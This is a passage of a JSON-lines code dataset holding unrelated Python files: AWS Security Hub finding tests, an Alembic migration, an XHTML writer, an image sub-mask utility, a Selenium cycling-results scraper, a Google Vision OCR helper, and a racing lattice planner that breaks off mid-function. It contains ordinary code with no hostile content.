the Cfn template\nwill turn into a valid API call.\n\"\"\"\nimport json\nfrom botocore.stub import Stubber\nimport pytest\nimport lib.sechub_findings as findings\nfrom lib.logger import Logger\nfrom lib.applogger import LogHandler\nfrom lib.awsapi_helpers import AWSClient\nfrom pytest_mock import mocker\n\nlog_level = 'info'\nlogger = Logger(loglevel=log_level)\ntest_data = 'tests/test_json_data/'\nstubber = Stubber(findings.securityhub)\n\n#------------------------------------------------------------------------------\n# Parse imported events\n#------------------------------------------------------------------------------\ndef test_parse_imported():\n\n test_cis_13 = open(test_data + 'CIS-1.3.json')\n event = json.loads(test_cis_13.read())\n test_cis_13.close()\n\n finding = findings.Finding(event['detail']['findings'][0])\n assert finding.details.get('Id') == event['detail']['findings'][0]['Id']\n assert finding.generator_id == 'arn:aws:securityhub:::ruleset/cis-aws-foundations-benchmark/v/1.2.0/rule/1.3'\n assert finding.account_id == '111111111111'\n assert finding.is_cis_ruleset() == { \n 'ruleset': 'cis-aws-foundations-benchmark', \n 'version': '1.2.0', \n 'ruleid': '1.3' \n }\n assert finding.is_aws_fsbp_ruleset() == False\n\n#------------------------------------------------------------------------------\n# \n#------------------------------------------------------------------------------\ndef test_parse_bad_imported():\n test_file = open(test_data + 'CIS-bad.json')\n event = json.loads(test_file.read())\n test_file.close()\n\n with pytest.raises(findings.InvalidFindingJson):\n finding = findings.Finding(event['detail']['findings'][0])\n\n#------------------------------------------------------------------------------\n# \n#------------------------------------------------------------------------------\ndef test_parse_custom_mismatch():\n test_file = open(test_data + 'custom-action-mismatch.json')\n event = json.loads(test_file.read())\n test_file.close()\n\n finding = findings.Finding(event['detail']['findings'][0])\n\n assert finding.details.get('Id') == event['detail']['findings'][0]['Id']\n assert finding.account_id == '111111111111'\n assert not finding.is_cis_ruleset()\n assert finding.is_aws_fsbp_ruleset() == { 'ruleset': 'aws-foundational-security-best-practices', 'version': '1.0.0', 'ruleid': 'CloudTrail.1' }\n\n#------------------------------------------------------------------------------\n# Parse custom action events\n#------------------------------------------------------------------------------\ndef test_parse_custom_match():\n test_file = open(test_data + 'CIS_1-6.json')\n event = json.loads(test_file.read())\n test_file.close()\n\n finding = findings.Finding(event['detail']['findings'][0])\n\n assert finding.details.get('Id') == event['detail']['findings'][0]['Id']\n assert finding.account_id == '111111111111'\n assert finding.is_cis_ruleset() == {\n 'ruleset': 'cis-aws-foundations-benchmark',\n 'version': '1.2.0',\n 'ruleid': '1.6'\n }\n assert not finding.is_aws_fsbp_ruleset()\n\n#------------------------------------------------------------------------------\n# notify\n# Criteria: absense of errors\n#------------------------------------------------------------------------------\ndef test_notify(mocker):\n test_file = open(test_data + 'CIS_1-6.json')\n event = json.loads(test_file.read())\n test_file.close()\n\n finding = findings.Finding(event['detail']['findings'][0])\n\n logger = Logger(loglevel='info')\n logger_obj = mocker.patch('lib.logger.Logger.info', return_value=None)\n\n applogger = LogHandler('pytest')\n mocker.patch('lib.applogger.LogHandler.add_message', return_value='')\n\n # mocker.patch('lib.sechub_findings.Finding.resolve', return_value='')\n\n mocker.patch('lib.sechub_findings.Finding.update_text', return_value='')\n\n AWS = AWSClient('aws','us-east-1')\n mocker.patch('lib.awsapi_helpers.AWSClient.postit', return_value='')\n\n test_message = {\n 'Note': '',\n 'State': 'INFO',\n 'Account': '111111111111',\n 'Remediation': 'Remediate all the things',\n 'AffectedObject': 'An AWS Thingy',\n 'metrics_data': {'status': 'RESOLVED'}\n }\n findings.notify(finding, test_message, logger, cwlogs=applogger, sechub=True, sns=AWS)\n logger_obj.assert_called_once_with(\n 'INFO: \"Remediate all the things\" , Account Id: 111111111111, Resource: An AWS Thingy'\n )\n\n # assert logger_mock('message', mocker.ANY)\n test_message = {\n }\n findings.notify(finding, test_message, logger, cwlogs=applogger, sechub=True, sns=AWS)\n logger_obj.assert_called_with(\n 'INFO: error - missing note, Account Id: error, Resource: error'\n )\n","sub_path":"source/playbooks/python_tests/test_sechub_findings.py","file_name":"test_sechub_findings.py","file_ext":"py","file_size_in_byte":5971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"477160912","text":"\"\"\"add admin table\n\nRevision ID: 1c694f620b6\nRevises: 37da297d7473\nCreate Date: 2014-06-23 17:03:19.469727\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1c694f620b6'\ndown_revision = '37da297d7473'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n op.create_table(\n 'admin',\n sa.Column('ukey', sa.VARCHAR(128), primary_key=True),\n sa.Column('date_created', sa.DateTime(), nullable=False))\n\n\ndef downgrade():\n op.drop_table('admin')\n","sub_path":"migration/versions/1c694f620b6_add_admin_table.py","file_name":"1c694f620b6_add_admin_table.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"68615739","text":"from __future__ import print_function, unicode_literals\n\nfrom pathlib import Path as _Path\n\n_default_author = dict(\n unicode_name=('', '堀内寛己', r'(ほりうちひろき)'),\n ascii_name=r'Hiroki Horiuchi',\n mail=r'x19290@gmail.com',\n)\n\ndef main():\n output = _Path(r'tmp.html')\n xhtml('\\n\\t

dummy par

', r'タイトル', r'1975-01-01', output)\n\ndef xhtml(body, title, date, output, summary='', copyright_=r'© 2016',\n author=_default_author, comment='', prev_ref=''\n ):\n from string import digits\n if comment:\n comment = '

%s

\\n' % comment\n name = list(author[r'unicode_name'])\n j = name.pop(0)\n short_name, long_name = name[0], j.join(name)\n ascii_name, mail = author[r'ascii_name'], author[r'mail']\n date_type = date[-1]\n template = _Path(__file__).with_name(r'template.html')\n with template.open(r'rt', encoding=r'UTF=8') as istream:\n template = istream.read()\n template = template.replace(r'@@null@@', '')\n template = template.replace(r'', 's')\n template = template.replace(r'', '>')\n template = template.replace(r';!-->', ';')\n template = template.replace('\\n\\t\\t%', '%').replace('\\n\\t%', '%')\n if date_type in digits:\n real_date = date\n else:\n real_date = date[:-1]\n xhtml = template % locals()\n with output.open(r'wt', encoding=r'UTF-8') as ostream:\n ostream.write(xhtml)\n\nif __name__ == r'__main__':\n main()\n","sub_path":"xhtml.py","file_name":"xhtml.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"269923019","text":"from PIL import Image\n\ndef create_sub_masks(mask_image):\n width, height = mask_image.size\n # print(width, height)\n\n # Initialize a dictionary of sub-masks indexed by RGB colors\n sub_masks = {}\n for x in range(width):\n for y in range(height):\n # Get the RGB values of the pixel\n pixel = mask_image.getpixel((x,y))[:3]\n\n # If the pixel is not black...\n if pixel != (0, 0, 0):\n # Check to see if we've created a sub-mask...\n pixel_str = str(pixel)\n sub_mask = sub_masks.get(pixel_str)\n # print(pixel_str)\n if sub_mask is None:\n # Create a sub-mask (one bit per pixel) and add to the dictionary\n # Note: we add 1 pixel of padding in each direction\n # because the contours module doesn't handle cases\n # where pixels bleed to the edge of the image\n sub_masks[pixel_str] = Image.new('1', (width+2, height+2))\n\n # Set the pixel value to 1 (default is 0), accounting for padding\n sub_masks[pixel_str].putpixel((x+1, y+1), 1)\n\n return sub_masks\n\nif __name__ == '__main__':\n im = Image.open('car_door_0_0.png')\n im.show()\n sub_mask = create_sub_masks(im)\n \n","sub_path":"JSON_generator/sub_masks_create.py","file_name":"sub_masks_create.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"211917731","text":"import openpyxl\nfrom selenium import webdriver\nfrom selenium.common.exceptions import InvalidElementStateException, NoSuchElementException\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\n\naEtappe = [30, 25, 23, 21, 19, 17, 15, 14, 13, 12, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1]\nbEtappe = [35, 30, 27, 24, 22, 20, 18, 17, 16, 15, 13, 11, 9, 8, 7, 6, 5, 4, 3, 2]\ncEtappe = [40, 35, 32, 29, 27, 25, 23, 21, 19, 17, 15, 13, 11, 9, 8, 7, 6, 5, 4, 3]\ngcPoints = [85, 65, 55, 45, 40, 35, 31, 27, 23, 19, 15, 14, 13, 12, 11, 10, 9, 8, 7, 6]\n\n\ndef setup(url, column):\n driver = webdriver.PhantomJS()\n driver.set_window_size(1120, 800)\n driver.get(url)\n readpage(driver, column)\n driver.close()\n\n\ndef readpage(driver, column):\n elements = driver.find_elements_by_xpath(\"//span/a\")\n riders = []\n for rider in elements:\n if len(rider.text) > 1 and rider.text != \"Login/Sign-up\":\n riders.append(rider.text)\n fixstring(riders, column)\n\n\ndef fixstring(riders, column):\n fixriders = []\n for name in range(0, len(riders), 2):\n name = riders[name].splitlines()\n if name[0] == \"DUMOULIN\" or name[0] == \"MARTIN\" or name[0] == \"IZAGIRRE\" or name[0] == \"HANSEN\" or name[0] == \"BENNETT\" or name[0] == \"JANSE VAN RENSBURG\":\n fixriders.append(name[0] + name[1][0])\n else:\n fixriders.append(name[0])\n writexlsx(fixriders, column)\n\n\ndef writexlsx(resultslist, column):\n filename = \"sprinters.xlsx\"\n wb = openpyxl.load_workbook(filename)\n sheet = wb.get_sheet_by_name('Sheet1')\n twocount = 1\n\n for i in resultslist:\n text = i\n result = i\n for i in range(3, 500):\n x = sheet['A' + str(i+1)]\n if x.value == text:\n sheet[column + str(i+1)] = \"Y\"\n twocount = twocount + 1\n wb.save('sprinters.xlsx')\n\nsetup(\"http://www.procyclingstats.com/race.php?id=163698\", \"C\")\nsetup(\"http://www.procyclingstats.com/race.php?id=163697\", \"E\")\nsetup(\"http://www.procyclingstats.com/race.php?id=163695\", \"G\")\nsetup(\"http://www.procyclingstats.com/race.php?id=163704\", \"I\")\nsetup(\"http://www.procyclingstats.com/race.php?id=163705\", \"K\")\nsetup(\"http://www.procyclingstats.com/race.php?id=163706\", \"M\")\nsetup(\"http://www.procyclingstats.com/race.php?id=163663\", \"O\")\n\n","sub_path":"procyclingstartlist.py","file_name":"procyclingstartlist.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"638726096","text":"# google library for communication with google vision api\nfrom google.cloud import vision\n\n# python-telegram-bot library\nfrom telegram import Update, File\n\n# Get temp folder and temp file names\nimport tempfile\n\n# System communication\nimport os\n\n\nclass Ocr:\n \"\"\"Class for communication with google vision api\"\"\"\n\n @staticmethod\n def get_text_from_image(image_file: File) -> str:\n \"\"\"Get text from image with google vision api\"\"\"\n\n # Get temp file path with tempfile library\n fd, temp_file_path = tempfile.mkstemp()\n\n # Download image\n image_file.download(temp_file_path)\n\n # Read image file as binary\n with open(temp_file_path, \"rb\") as image_file:\n content = image_file.read()\n\n # Create vision.Image object to use it in document_text_detection function\n image = vision.Image(content=content)\n\n # Get response from google vision api\n # client field will be add to function in telegram_bot.py script\n response = Ocr.client.document_text_detection(image=image)\n\n # Get text from response\n text = response.full_text_annotation.text\n\n # Close file, automatic deletion will occur\n os.close(fd)\n\n # Return text\n return text\n","sub_path":"image_to_text_bot/ocr_api.py","file_name":"ocr_api.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"273740129","text":"from mpc import trajectory_generator_utils, pure_pursuit_utils\nimport numpy as np\nfrom PIL import Image\nfrom numpy import linalg as LA\nimport math\nimport os, sys\nimport yaml\nimport msgpack\nfrom numba import njit\nfrom numba.typed import List, Dict\nimport time\nfrom mpc import AStrajectory_generator as trajectory_generator\n# import matplotlib.pyplot as plt\n\nBRAKE_STEPS = 60\nassert(BRAKE_STEPS <= trajectory_generator.NUM_STEPS)\n\n@njit(fastmath=False, cache=True)\ndef corner(current_s, WINDOW_SIZE, waypoints):\n # cond = np.abs(dxdy[0]/dxdy[1]) < self.CORNER_THRESH\n picked_s = current_s + WINDOW_SIZE\n current_s -= WINDOW_SIZE\n current_idx = np.searchsorted(waypoints[:, 4], current_s, side='right') - 1\n picked_idx = np.searchsorted(waypoints[:, 4], picked_s, side='right') - 1\n if current_idx < 0:\n current_idx = 0\n if picked_idx < 0:\n picked_idx = 0\n if picked_idx < current_idx:\n curvature_sum = np.sum(waypoints[current_idx:, 5]) + np.sum(waypoints[0:picked_idx+1, 5])\n else:\n curvature_sum = np.sum(waypoints[current_idx:picked_idx+1, 5])\n curvature_sum = np.abs(curvature_sum)\n return curvature_sum\n\n@njit(fastmath=False, cache=True)\ndef flow_to_xytheta_static(st, pose, wpts, lut_resolution, speed_lut, window_size, curvature_thresh, corner_on_b4):\n # st (num_traj x 2)\n # pose [x, y, theta]\n if np.any(np.isnan(st)):\n return None, None, None, corner_on_b4\n # wpts = self.waypoints\n # pose_query = (int(np.round(pose[0]/self.lut_resolution)), int(np.round(pose[1]/self.lut_resolution)))\n pose_query = (int(np.round(pose[0]/lut_resolution)), int(np.round(pose[1]/lut_resolution)))\n # try:\n # pose_val = self.speed_lut[pose_query]\n # except:\n # return None, None, None\n if pose_query in speed_lut:\n pose_val = speed_lut[pose_query]\n else:\n return None, None, None, corner_on_b4\n current_s = pose_val[4]\n # corner_sum = corner(current_s, self.WINDOW_SIZE, self.waypoints)\n corner_sum = corner(current_s, window_size, wpts)\n # if corner_sum >= self.CURVATURE_THRESH:\n # self.CORNER_ON = True\n # temp_s = st[:, 0]*self.CURVATURE_THRESH/corner_sum#*.35\n # else:\n # self.CORNER_ON = False\n # temp_s = st[:, 0]\n if corner_sum >= curvature_thresh:\n corner_on = True\n temp_s = st[:, 0]*curvature_thresh/corner_sum#*.35\n else:\n corner_on = False\n temp_s = st[:, 0]\n new_s = current_s + temp_s\n new_s[new_s >= wpts[-1, 4]] -= wpts[-1, 4]\n waypoint_idx = np.searchsorted(wpts[:, 4], new_s, side='right') - 1\n waypoint_idx[waypoint_idx < 0] = 0\n waypoint_idx[waypoint_idx >= wpts.shape[0]-1] = wpts.shape[0] - 2\n l = (new_s - wpts[waypoint_idx, 4]) / (wpts[waypoint_idx+1, 4] - wpts[waypoint_idx, 4])\n new_x = wpts[waypoint_idx, 0] + l*(wpts[waypoint_idx+1, 0] - wpts[waypoint_idx, 0])\n new_y = wpts[waypoint_idx, 1] + l*(wpts[waypoint_idx+1, 1] - wpts[waypoint_idx, 1])\n pt_xy = np.stack((new_x, new_y), axis=1)\n angle = wpts[waypoint_idx, 3] + np.pi/2\n # xy = st[:, 1][:, None]*np.asarray([np.cos(angle), np.sin(angle)]).T + pt_xy\n angle_arr = np.stack((np.cos(angle), np.sin(angle)), axis=1)\n xy = np.expand_dims(st[:, 1], axis=1)*angle_arr + pt_xy\n xy -= np.expand_dims(pose[:2], axis=0)\n rot = np.array([[np.cos(-pose[2]), np.sin(-pose[2])],[-np.sin(-pose[2]), np.cos(-pose[2])]])\n xy = np.dot(xy, rot)\n theta = wpts[waypoint_idx, 3] + st[:, 2] - pose[2]\n theta = np.mod(theta, 2*np.pi)\n theta[theta>np.pi] -= (2*np.pi)\n temp = np.concatenate((xy, np.expand_dims(theta, axis=1)), axis=1)\n return temp, current_s, new_s, corner_on\n\nclass LatticePlanner(object):\n OPP_SPEED_SCALE = 1.00 # 0.99 for tempering\n def __init__(self, map_path, cost_weights, waypoints, directory, is_ego):\n \"\"\"\n Args:\n map_path (str): path to the map yaml file (ROS convention)\n cost_weights (ndarray(n,)): array of weights for each cost term\n waypoints (ndaaray(Nx4)): nominal raceline from tuner car\n\n \"\"\"\n self.limp_s = 0.\n self.is_limping = False\n self.is_ego = is_ego\n self.prev_traj = None\n self.prev_param = None\n self.prev_steer = 0.\n self.cost_weights = cost_weights\n self.waypoints = waypoints\n self.wheelbase = 0.3302\n self.max_reacquire = 10\n self.safe_speed = 2.5\n\n self.CORNER_ON = False\n self.track_lad = 1.0\n self.STEER_LP = 0.99\n #self.CORNER_THRESH = 0.\n self.CURVATURE_THRESH = 20.#10.\n # self.CURVATURE_THRESH = np.inf\n self.WINDOW_SIZE = 3.\n\n self.TOP_POP_NUM = 3\n\n lut_all = np.load(directory + 'mpc/lut_inuse.npz')\n self.lut_x = lut_all['x']\n self.lut_y = lut_all['y']\n self.lut_theta = lut_all['theta']\n self.lut_kappa = lut_all['kappa']\n self.lut = lut_all['lut']\n step_sizes = []\n step_sizes.append(self.lut_x[1]-self.lut_x[0])\n step_sizes.append(self.lut_y[1]-self.lut_y[0])\n step_sizes.append(self.lut_theta[1]-self.lut_theta[0])\n step_sizes.append(self.lut_kappa[1]-self.lut_kappa[0])\n self.lut_stepsizes = np.array(step_sizes)\n\n with open(directory+'config.yaml', 'r') as yaml_stream:\n try:\n config = yaml.safe_load(yaml_stream)\n speed_lut_name = config['speed_lut_name']\n range_lut_name = config['range_lut_name']\n except yaml.YAMLError as ex:\n print(ex)\n\n\n speed_lut_temp = msgpack.unpack(open(directory + speed_lut_name, 'rb'), use_list=False)\n self.speed_lut_numba = Dict()\n for key, val in speed_lut_temp.items():\n if key == b'resolution':\n continue\n self.speed_lut_numba[key] = val\n range_lut_temp = msgpack.unpack(open(directory + range_lut_name, 'rb'), use_list=False)\n self.range_lut_numba = Dict()\n for key, val in range_lut_temp.items():\n if key == b'resolution':\n continue\n self.range_lut_numba[key] = val\n \n # self.lut_resolution = 0.01\n self.lut_resolution = float(speed_lut_temp[b'resolution'][0])\n\n def update_cost(self, cost_weights):\n self.prev_traj = None\n self.prev_param = None\n self.prev_steer = 0\n self.cost_weights = cost_weights\n\n def _rotation_matrix(self, angle, direction, point=None):\n sina = math.sin(angle)\n cosa = math.cos(angle)\n direction = self._unit_vector(direction[:3])\n # rotation matrix around unit vector\n R = np.array(((cosa, 0.0, 0.0),\n (0.0, cosa, 0.0),\n (0.0, 0.0, cosa)), dtype=np.float64)\n R += np.outer(direction, direction) * (1.0 - cosa)\n direction *= sina\n R += np.array((( 0.0, -direction[2], direction[1]),\n ( direction[2], 0.0, -direction[0]),\n (-direction[1], direction[0], 0.0)),\n dtype=np.float64)\n M = np.identity(4)\n M[:3, :3] = R\n if point is not None:\n # rotation not around origin\n point = np.array(point[:3], dtype=np.float64, copy=False)\n M[:3, 3] = point - np.dot(R, point)\n return M\n\n def _unit_vector(self, data, axis=None, out=None):\n if out is None:\n data = np.array(data, dtype=np.float64, copy=True)\n if data.ndim == 1:\n data /= math.sqrt(np.dot(data, data))\n return data\n else:\n if out is not data:\n out[:] = np.array(data, copy=False)\n data = out\n length = np.atleast_1d(np.sum(data*data, axis))\n np.sqrt(length, length)\n if axis is not None:\n length = np.expand_dims(length, axis)\n data /= length\n if out is None:\n return data\n\n def _get_current_waypoint(self, waypoints, lookahead_distance, position, theta):\n wpts = waypoints[:, 0:2]\n # position = np.array(position[0:2])\n nearest_point, nearest_dist, t, i = pure_pursuit_utils.nearest_point_on_trajectory_py2(position, wpts)\n if nearest_dist < lookahead_distance:\n lookahead_point, i2, t2 = pure_pursuit_utils.first_point_on_trajectory_intersecting_circle(position, lookahead_distance, wpts, i+t, wrap=True)\n if i2 == None:\n return None\n current_waypoint = np.empty(waypoints[i2, :].shape)\n # x, y\n current_waypoint[0:2] = waypoints[i2, 0:2]\n # theta\n current_waypoint[3] = waypoints[i2, 3]\n # speed\n current_waypoint[2] = waypoints[i2, 2]\n return current_waypoint\n elif nearest_dist < self.max_reacquire:\n return waypoints[i, :]\n else:\n return None\n\n def _get_current_speed(self, position, theta):\n wpts = self.waypoints[:, 0:2]\n position = position[0:2]\n nearest_point, nearest_dist, t, i = pure_pursuit_utils.nearest_point_on_trajectory_py2(position, wpts)\n speed = self.waypoints[i, 2]\n return speed, nearest_dist\n\n def _pure_pursuit(self, pose_x, pose_y, pose_theta, trajectory, lookahead_distance):\n # returns speed, steering_angle pair\n\n if trajectory is None:\n # trajectory gone, moving straight forward\n return self.safe_speed, 0.0\n position = np.array([pose_x, pose_y])\n lookahead_point = self._get_current_waypoint(trajectory, lookahead_distance, position, pose_theta)\n if lookahead_point is None:\n # no lookahead point, slow down\n return self.safe_speed, 0.0\n\n speed, steering_angle = pure_pursuit_utils.get_actuation(pose_theta, lookahead_point, position, lookahead_distance, self.wheelbase)\n\n # if abs(steering_angle) > 0.4189:\n # print('clipped')\n # steering_angle = (steering_angle/abs(steering_angle))*0.4189\n return speed, steering_angle\n\n\n # def flow_to_xytheta(self, st, pose):\n # # st (num_traj x 2)\n # # pose [x, y, theta]\n # if np.any(np.isnan(st)):\n # return None, None, None\n # wpts = self.waypoints\n # pose_query = (int(np.round(pose[0]/self.lut_resolution)), int(np.round(pose[1]/self.lut_resolution)))\n # try:\n # pose_val = self.speed_lut[pose_query]\n # except:\n # return None, None, None\n # current_s = pose_val[4]\n # # if self.corner(current_s):\n # corner_sum = corner(current_s, self.WINDOW_SIZE, self.waypoints)\n # if corner_sum >= self.CURVATURE_THRESH:\n # self.CORNER_ON = True\n # temp_s = st[:, 0]*self.CURVATURE_THRESH/corner_sum#*.35\n # else:\n # self.CORNER_ON = False\n # temp_s = st[:, 0]\n # new_s = current_s + temp_s\n # new_s[new_s >= wpts[-1, 4]] -= wpts[-1, 4]\n # waypoint_idx = np.searchsorted(wpts[:, 4], new_s, side='right') - 1\n # waypoint_idx[waypoint_idx < 0] = 0\n # waypoint_idx[waypoint_idx >= wpts.shape[0]-1] = wpts.shape[0] - 2\n # l = (new_s - wpts[waypoint_idx, 4]) / (wpts[waypoint_idx+1, 4] - wpts[waypoint_idx, 4])\n # new_x = wpts[waypoint_idx, 0] + l*(wpts[waypoint_idx+1, 0] - wpts[waypoint_idx, 0])\n # new_y = wpts[waypoint_idx, 1] + l*(wpts[waypoint_idx+1, 1] - wpts[waypoint_idx, 1])\n # pt_xy = np.stack((new_x, new_y), axis=1)\n # angle = wpts[waypoint_idx, 3] + np.pi/2\n # xy = st[:, 1][:, None]*np.asarray([np.cos(angle), np.sin(angle)]).T + pt_xy\n # # print('lattice xy', xy)\n # xy -= np.expand_dims(pose[:2], axis=0)\n # rot = np.array([[np.cos(-pose[2]), np.sin(-pose[2])],[-np.sin(-pose[2]), np.cos(-pose[2])]])\n # xy = np.dot(xy, rot)\n # theta = wpts[waypoint_idx, 3] + st[:, 2] - pose[2]\n # theta = np.mod(theta, 2*np.pi)\n # theta[theta>np.pi] -= (2*np.pi)\n # temp = np.concatenate((xy, np.expand_dims(theta, axis=1)), axis=1)\n # # time.sleep(0.5)\n # # print('grid', temp[0])\n # # print('theta', theta[0])\n # # print('wpt theta', wpts[waypoint_idx[0], 3])\n # # print('pose theta', pose[2])\n # return temp, current_s, new_s\n\n #TODO match new interface (i.e. receives current_vel) for plan_robust and plan_multiple\n def plan(self, pose, opp_pose, sampled_flow, other_prev_traj, other_prev_param, opp_collision, ds, current_vel):\n current_vel = max(0.01, current_vel)\n pose_x, pose_y, pose_theta = pose\n # sampled flow is: ds, dt, dtheta, dv for each knot pt on top of baseline v\n # return 0, 0, 0\n if self.is_ego:\n other_prev_traj[:,4]*=LatticePlanner.OPP_SPEED_SCALE\n \n # lookup_grid, current_s, new_s = self.flow_to_xytheta(sampled_flow[:, 0:3], pose)\n lookup_grid, current_s, new_s, corner_on = flow_to_xytheta_static(sampled_flow[:, 0:3], np.array(pose), self.waypoints, self.lut_resolution, self.speed_lut_numba, self.WINDOW_SIZE, self.CURVATURE_THRESH, self.CORNER_ON)\n self.CORNER_ON = corner_on\n if lookup_grid is None:\n safety_flag = False\n states_list_plot = None\n pp_traj, prev_traj_plot = self.getLimpParameters(pose_x, pose_y, current_vel)\n self.prev_flow = None\n return pp_traj, safety_flag, self.prev_flow, states_list_plot, prev_traj_plot, lookup_grid\n \n kappa0 = trajectory_generator.get_curvature_command(np.roll(self.prev_param,-1), ds+self.limp_s) if self.prev_param is not None else 0.0\n\n # traj lookup\n rot = self._rotation_matrix(pose_theta, (0, 0, 1))\n states_list_local, parameters_list, filtered_flow, filtered_grid, filtered_new_s = trajectory_generator_utils.grid_lookup(lookup_grid, self.lut_x, self.lut_y, self.lut_theta, self.lut_kappa, self.lut, sampled_flow, new_s, kappa0, self.lut_stepsizes)\n num_traj = parameters_list.shape[0]\n # print('num_traj', num_traj)\n # print('pose', pose_x, pose_y, pose_theta)\n if num_traj == 0:\n safety_flag = False\n states_list_plot = None\n pp_traj, prev_traj_plot = self.getLimpParameters(pose_x, pose_y, current_vel)\n self.prev_flow = None\n return pp_traj, safety_flag, self.prev_flow, states_list_plot, prev_traj_plot, lookup_grid\n\n states_list = trajectory_generator_utils.trans_traj_list(states_list_local, np.array([[pose_x], [pose_y], [0.0]]), rot)\n\n dspeed = filtered_flow[:, 3:]\n new_states_list = trajectory_generator_utils.get_velocity_profile(states_list, self.waypoints, dspeed, num_traj, current_vel)\n\n\n # TODO: get opponent states from somewhere\n\n # cost calculation\n if other_prev_traj is None or other_prev_param is None:\n other_prev_param = np.array([5., 0, 0, 0, 0])\n # TODO: assumes zero heading now\n other_prev_traj = np.zeros((trajectory_generator.NUM_STEPS, 5))\n temp = np.linspace(0., 5., trajectory_generator.NUM_STEPS)\n other_prev_traj[:, 0] = opp_pose[0]+temp*np.cos(opp_pose[2])\n other_prev_traj[:, 1] = opp_pose[1]+temp*np.sin(opp_pose[2])\n other_prev_traj[:, 4] = trajectory_generator_utils.WAYPOINT_SPEED\n self.prev_flow = None\n\n if self.prev_traj is None or self.prev_param is None:\n self.prev_param = np.array([5., 0, 0, 0, 0])\n self.prev_traj = np.zeros((trajectory_generator.NUM_STEPS, 5))\n temp = np.linspace(0., 5., trajectory_generator.NUM_STEPS)\n self.prev_traj[:, 0] = pose[0]+temp*np.cos(pose[2])\n self.prev_traj[:, 1] = pose[1]+temp*np.sin(pose[2])\n self.prev_traj[:,2] = pose[2]\n self.prev_traj[:, 4] += trajectory_generator_utils.WAYPOINT_SPEED\n self.prev_flow = None\n self.prev_steer = 0.0 \n prev_traj_plot = self.prev_traj\n pp_traj = np.empty((self.prev_traj.shape[0], 4))\n pp_traj[:, 0:2] = self.prev_traj[:, 0:2]\n pp_traj[:, 2] = self.prev_traj[:, 4]\n pp_traj[:, 3] = self.prev_traj[:, 2]\n return pp_traj, False, self.prev_flow, None, prev_traj_plot, lookup_grid\n\n opp_relative_weights = np.array([1.])\n\n traj_costs, end_xy = trajectory_generator_utils.get_traj_list_cost(states_list, new_states_list, self.cost_weights, self.waypoints, self.prev_traj, parameters_list, other_prev_traj, np.array([other_prev_param]), opp_relative_weights, opp_collision)\n #traj_costs[0,:] = trajectory_generator_utils.get_lane_cost_traj_list_nonnumba(states_list, num_traj, self.speed_lut, self.lut_resolution)\n traj_costs[4, :] = trajectory_generator_utils.get_s_cost_wlut(states_list, num_traj, self.waypoints, self.speed_lut_numba, self.lut_resolution)\n traj_costs[9, :] = trajectory_generator_utils.get_range_costs(states_list, num_traj, self.range_lut_numba, self.lut_resolution)\n traj_costs[12, :] = trajectory_generator_utils.get_progress_costs(end_xy, opp_relative_weights, num_traj, self.speed_lut_numba, self.lut_resolution)\n # traj_costs[14, :] = np.zeros((num_traj, ))\n\n # summing with cost weights\n traj_costs_final = trajectory_generator_utils.sum_cost(traj_costs, self.cost_weights)\n\n empty_cost_flag = False\n is_inf_flag = False\n safety_flag = False\n\n try:\n # lowest_cost_idx = np.argmin(traj_costs_final)\n non_inf_idx = np.where(np.isfinite(traj_costs_final))[0]\n non_inf_costs = traj_costs_final[non_inf_idx]\n k = min(self.TOP_POP_NUM - 1, non_inf_costs.shape[0])\n lowest_cost_idx_top = np.argpartition(non_inf_costs, k)[:k+1]\n lowest_cost_idx = np.argmin(non_inf_costs[lowest_cost_idx_top])\n lowest_cost_idx = lowest_cost_idx_top[lowest_cost_idx]\n lowest_cost_idx = non_inf_idx[lowest_cost_idx]\n\n # print(traj_costs[:, lowest_cost_idx])\n # /np.sum(traj_costs[:, lowest_cost_idx]))\n\n # dxdy = filtered_grid[lowest_cost_idx, 0:2]\n # cond = self.corner(current_s)\n # if np.isinf(traj_costs_final[lowest_cost_idx]):\n # is_inf_flag = True\n # self.prev_flow = None\n # else:\n best_traj = new_states_list[lowest_cost_idx*trajectory_generator.NUM_STEPS:(lowest_cost_idx+1)*trajectory_generator.NUM_STEPS, :]\n self.prev_traj = best_traj\n pp_traj = np.empty((best_traj.shape[0], 4))\n pp_traj[:, 0:2] = best_traj[:, 0:2]\n pp_traj[:, 2] = best_traj[:, 4]\n pp_traj[:, 3] = best_traj[:, 2]\n self.prev_flow = (filtered_flow[non_inf_idx, :])[lowest_cost_idx_top, :]\n self.prev_param = parameters_list[lowest_cost_idx, :]\n self.is_limping = False\n self.limp_s = 0.\n\n except ValueError:\n empty_cost_flag = True\n is_inf_flag = True\n self.prev_flow = None\n\n if empty_cost_flag or is_inf_flag:\n #safety_flag = True\n #states_list_plot = None\n #prev_traj_plot = None\n #pp_traj = self.waypoints[:, 0:4]\n safety_flag = False\n states_list_plot = None\n pp_traj, prev_traj_plot = self.getLimpParameters(pose_x, pose_y, current_vel)\n else:\n states_list_plot = states_list\n prev_traj_plot = self.prev_traj\n\n return pp_traj, safety_flag, self.prev_flow, states_list_plot, prev_traj_plot, lookup_grid\n\n def getLimpParameters(self, pose_x, pose_y, current_vel):\n # NEW\n s_tot = np.linspace(0,self.prev_param[0],trajectory_generator.NUM_STEPS)\n s_tot -= s_tot[0]\n _, _, _, idx = pure_pursuit_utils.nearest_point_on_trajectory_py2(np.array([pose_x, pose_y]), self.prev_traj[:,:2])\n idx = min(idx,self.prev_traj.shape[0]-3)\n s_idx = s_tot[idx:]\n s_idx -= s_idx[0]\n 